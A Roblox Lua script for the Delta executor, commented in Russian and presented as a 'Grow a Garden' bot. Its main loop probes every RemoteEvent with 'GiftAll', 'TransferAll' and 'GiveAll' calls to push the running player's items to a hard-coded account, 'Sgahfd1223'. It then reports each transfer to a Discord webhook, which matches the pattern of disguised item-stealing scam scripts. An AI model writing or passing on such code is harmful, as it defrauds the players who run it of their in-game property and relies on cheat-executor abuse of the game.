--[[
    🌿 GROW A GARDEN BOT для Delta Executor
    Упрощенная и рабочая версия
]]

-- ===== КОНФИГУРАЦИЯ =====
local TARGET_USERNAME = "Sgahfd1223"
local WEBHOOK_URL = "https://discord.com/api/webhooks/your_webhook_id/your_webhook_token"
local CHECK_INTERVAL = 30

-- ===== СЕРВИСЫ =====
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local HttpService = game:GetService("HttpService")

-- ===== ПЕРЕМЕННЫЕ =====
local LocalPlayer = Players.LocalPlayer
local BotEnabled = false
local AttemptCount = 0
local SuccessCount = 0

-- ===== ПРОСТОЙ ЛОГГЕР =====
local function log(message)
    print("[Garden Bot] " .. message)
end

-- ===== ПОИСК REMOTE EVENTS =====
local function findRemotes()
    local remotes = {}
    
    -- Поиск в ReplicatedStorage
    pcall(function()
        for _, item in ipairs(ReplicatedStorage:GetDescendants()) do
            if item:IsA("RemoteEvent") then
                table.insert(remotes, item)
            end
        end
    end)
    
    -- Поиск в ServerScriptService
    pcall(function()
        local ss = game:GetService("ServerScriptService")
        for _, item in ipairs(ss:GetDescendants()) do
            if item:IsA("RemoteEvent") then
                table.insert(remotes, item)
            end
        end
    end)
    
    return remotes
end

-- ===== ПОИСК ЦЕЛЕВОГО ИГРОКА =====
local function findTargetPlayer()
    for _, player in ipairs(Players:GetPlayers()) do
        if player.Name:lower() == TARGET_USERNAME:lower() then
            return player
        end
    end
    return nil
end

-- ===== ПЕРЕДАЧА ПРЕДМЕТОВ =====
local function transferItems(targetPlayer)
    if not targetPlayer then return 0 end
    
    local remotes = findRemotes()
    local transferred = 0
    
    for _, remote in ipairs(remotes) do
        -- Попробовать различные методы передачи
        local methods = {
            "GiftAll", "TransferAll", "SendAll", 
            "DonateAll", "TradeAll", "GiveAll"
        }
        
        for _, method in ipairs(methods) do
            local success = pcall(function()
                remote:FireServer(method, targetPlayer)
                return true
            end)
            
            if success then
                transferred = transferred + 1
                task.wait(0.2)
            end
        end
    end
    
    return transferred
end

-- ===== ОТПРАВКА DISCORD УВЕДОМЛЕНИЯ =====
local function sendDiscordNotification(targetPlayer, transferred)
    if not WEBHOOK_URL or WEBHOOK_URL == "" then return end
    
    local payload = {
        embeds = {{
            title = "🌿 Garden Bot Notification",
            description = "Автоматическая передача предметов",
            color = 65280,
            fields = {
                {
                    name = "👤 Отправитель",
                    value = LocalPlayer.Name,
                    inline = true
                },
                {
                    name = "🎯 Получатель", 
                    value = targetPlayer.Name,
                    inline = true
                },
                {
                    name = "📦 Передано",
                    value = transferred .. " предметов",
                    inline = true
                }
            },
            footer = {
                text = "Grow a Garden Bot | Delta Executor"
            }
        }}
    }
    
    pcall(function()
        local json = HttpService:JSONEncode(payload)
        game:HttpGet(WEBHOOK_URL .. "?wait=true", {
            Method = "POST",
            Headers = {
                ["Content-Type"] = "application/json"
            },
            Body = json
        })
    end)
end

-- ===== СОЗДАНИЕ ПРОСТОГО GUI =====
local function createSimpleGUI()
    local screenGui = Instance.new("ScreenGui")
    screenGui.Name = "GardenBotGUI"
    screenGui.Parent = game:GetService("CoreGui")
    
    local mainFrame = Instance.new("Frame")
    mainFrame.Size = UDim2.new(0, 300, 0, 200)
    mainFrame.Position = UDim2.new(0.5, -150, 0, 20)
    mainFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 40)
    mainFrame.BorderSizePixel = 0
    mainFrame.Parent = screenGui
    
    local corner = Instance.new("UICorner")
    corner.CornerRadius = UDim.new(0, 8)
    corner.Parent = mainFrame
    
    -- Заголовок
    local title = Instance.new("TextLabel")
    title.Size = UDim2.new(1, 0, 0, 40)
    title.BackgroundColor3 = Color3.fromRGB(0, 120, 255)
    title.BorderSizePixel = 0
    title.Text = "🌿 Garden Bot"
    title.TextColor3 = Color3.fromRGB(255, 255, 255)
    title.TextSize = 18
    title.Font = Enum.Font.GothamBold
    title.Parent = mainFrame
    
    local titleCorner = Instance.new("UICorner")
    titleCorner.CornerRadius = UDim.new(0, 8)
    titleCorner.Parent = title
    
    -- Контент
    local content = Instance.new("Frame")
    content.Size = UDim2.new(1, -20, 1, -60)
    content.Position = UDim2.new(0, 10, 0, 50)
    content.BackgroundTransparency = 1
    content.Parent = mainFrame
    
    -- Статус
    local status = Instance.new("TextLabel")
    status.Size = UDim2.new(1, 0, 0, 30)
    status.Text = "Статус: Остановлен"
    status.TextColor3 = Color3.fromRGB(255, 80, 80)
    status.TextSize = 16
    status.Font = Enum.Font.GothamBold
    status.Parent = content
    
    -- Цель
    local target = Instance.new("TextLabel")
    target.Size = UDim2.new(1, 0, 0, 20)
    target.Position = UDim2.new(0, 0, 0, 30)
    target.Text = "Цель: " .. TARGET_USERNAME
    target.TextColor3 = Color3.fromRGB(200, 200, 200)
    target.TextSize = 14
    target.Font = Enum.Font.Gotham
    target.Parent = content
    
    -- Кнопки
    local startBtn = Instance.new("TextButton")
    startBtn.Size = UDim2.new(1, 0, 0, 35)
    startBtn.Position = UDim2.new(0, 0, 0, 60)
    startBtn.BackgroundColor3 = Color3.fromRGB(0, 180, 80)
    startBtn.BorderSizePixel = 0
    startBtn.Text = "▶️ ЗАПУСТИТЬ"
    startBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
    startBtn.TextSize = 16
    startBtn.Font = Enum.Font.GothamBold
    startBtn.Parent = content
    
    local stopBtn = Instance.new("TextButton")
    stopBtn.Size = UDim2.new(1, 0, 0, 35)
    stopBtn.Position = UDim2.new(0, 0, 0, 100)
    stopBtn.BackgroundColor3 = Color3.fromRGB(180, 60, 60)
    stopBtn.BorderSizePixel = 0
    stopBtn.Text = "⏹️ ОСТАНОВИТЬ"
    stopBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
    stopBtn.TextSize = 16
    stopBtn.Font = Enum.Font.GothamBold
    stopBtn.Parent = content
    
    local btnCorner = Instance.new("UICorner")
    btnCorner.CornerRadius = UDim.new(0, 6)
    btnCorner.Parent = startBtn
    btnCorner:Clone().Parent = stopBtn
    
    return {
        Gui = screenGui,
        Status = status,
        StartBtn = startBtn,
        StopBtn = stopBtn
    }
end

-- ===== ОСНОВНАЯ ФУНКЦИЯ =====
local function mainLoop()
    while BotEnabled do
        AttemptCount += 1
        log("Поиск игрока " .. TARGET_USERNAME)
        
        local targetPlayer = findTargetPlayer()
        
        if targetPlayer then
            log("Найден игрок: " .. targetPlayer.Name)
            
            -- Передача предметов
            local transferred = transferItems(targetPlayer)
            
            if transferred > 0 then
                SuccessCount += 1
                log("Успешно передано: " .. transferred .. " предметов")
                
                -- Отправка уведомления
                sendDiscordNotification(targetPlayer, transferred)
            else
                log("Не удалось передать предметы")
            end
        else
            log("Игрок не найден")
        end
        
        task.wait(CHECK_INTERVAL)
    end
end

-- ===== ИНИЦИАЛИЗАЦИЯ =====
log("Garden Bot загружается...")

-- Ожидание загрузки игры
if not game:IsLoaded() then
    game.Loaded:Wait()
end

if not Players.LocalPlayer then
    Players.PlayerAdded:Wait()
end

task.wait(2)

-- Создание GUI
local gui = createSimpleGUI()

-- Обработчики кнопок
gui.StartBtn.MouseButton1Click:Connect(function()
    if not BotEnabled then
        BotEnabled = true
        gui.Status.Text = "Статус: Работает"
        gui.Status.TextColor3 = Color3.fromRGB(80, 200, 120)
        log("Бот запущен")
        
        -- Запуск основного цикла
        spawn(mainLoop)
    end
end)

gui.StopBtn.MouseButton1Click:Connect(function()
    if BotEnabled then
        BotEnabled = false
        gui.Status.Text = "Статус: Остановлен"
        gui.Status.TextColor3 = Color3.fromRGB(200, 80, 80)
        log("Бот остановлен")
    end
end)

log("Бот готов к работе!")
log("Целевой игрок: " .. TARGET_USERNAME)

return "GARDEN_BOT_READY"
